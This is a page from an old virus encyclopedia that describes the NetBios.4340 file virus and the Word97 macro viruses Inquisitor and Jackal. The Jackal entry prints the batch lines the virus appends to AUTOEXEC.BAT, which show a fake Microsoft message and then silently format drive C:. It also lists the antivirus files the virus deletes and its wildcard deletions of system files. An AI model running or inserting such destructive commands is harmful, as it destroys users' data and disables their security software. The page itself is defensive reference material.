Virus Database


NetBios.4340

Description NetBios.4340

It is a dangerous memory resident parasitic virus. It hooks INT 21h and writes itself to the end of COM and EXE files that are accessed. When an infected file is executed, the virus disinfects it. The virus overwrites some EXE files with a trojan program that erases CMOS, disk sectors and manifests itself with some video effect. This virus contains the text string:
Retix PC-21 NETBIOS

Check other viruses! Be aware! Use Antiviral Software

Macro.Word97.Inquisitor

Description Macro.Word97.Inquisitor

This virus contains seven macros in single "Module1" module : AutoOpen, Inquisitor97, n, a, ToolsMacro, ViewVBCode, Payload. The virus replicates on documents opening. Depending on system random counter or on entering the Tools/Macro menu item the virus replaced all symbol "e" with "s" within the current document. On entering the Tools/Macro the virus also displays the MessageBox:
You have been infected by Inquisitor97

Macro.Word97.Jackal

Description Macro.Word97.Jackal

This virus contains one module "Jackal" which contains fourteen macros: AutoOpen, FileSaveAs, KillAV, Format, ToolsMacro, ViewVBCode, FileTemplates, Organizer, EditFind, HelpAbout, ToolsCustomize, ToolsOptions, Jackal, Ultras.
The virus replicates itself on opening files or saving with new name. It erases the files belonging to popular anti-virus applications:
C:Program FilesAntiViral Toolkit ProAvp32.exe
C:Program FilesAntiViral Toolkit Pro*.avc
C:Program FilesCommand SoftwareF-PROT95*.dll
C:Program FilesCommand SoftwareF-PROT95*.exe
C:Program FilesMcAfeeVirusScan95Scan.dat
C:Program FilesMcAfeeVirusScanScan.dat
C:Program FilesNorton AntiVirusViruscan.dat
C:Program FilesSymantecSymevnt.386
C:Program FilesFindVirusFindviru.drv
C:Program FilesCheyenneAntiVirus*.dll
C:Program FilesCheyenneCommonCshell.dll
C:PC-Cillin 95Lpt$vpn.*
C:PC-Cillin 95Scan32.dll
C:PC-Cillin 97Lpt$vpn.*
C:PC-Cillin 97Scan32.dll
C:eSafeProtect*.dll
C:f-macrof-macro.exe
C:TBAVW95Tbscan.sig
C:Tbavw95Tb*.*
C:VS95*.dll

On the 1st of any month it sets the password "JACKAL" in documents. On the 27th of any month it sets the password "ULTRAS". On 5, 9, 17, 25 days and during May it displays the Balloon:
Microsoft Office 97
Error, is necessary will update files

Then it appends to the C:AUTOEXEC.BAT file the commands that format the disk:
@ECHO OFF
CLS
ECHO Microsoft Corp. 1983-1997 All rights reserved
ECHO Goes preparation to renovation of your system files
ECHO Please wait this can occupy several minutes
FORMAT C: /U /C /S /AUTOTEST > NUL
ECHO.
ECHO.
ECHO.
ECHO Error at renovations of files

On 15th and 30th of any month it deletes the files:
C:*.*
C:Windows*.*
C:WindowsSystem*.*

Home

Viruses from A to Z
0-9 A B Ñ D E F G H I J
K L M N O P Q R S T
U V W X Y Z



Dog Fencing
Ereader
Alpha Urls
Onlineshop Programmierer
Cosmetic Surgery Financing

    Copyright © 2005 Virus-Database.com
© 2005 Virus-Database.com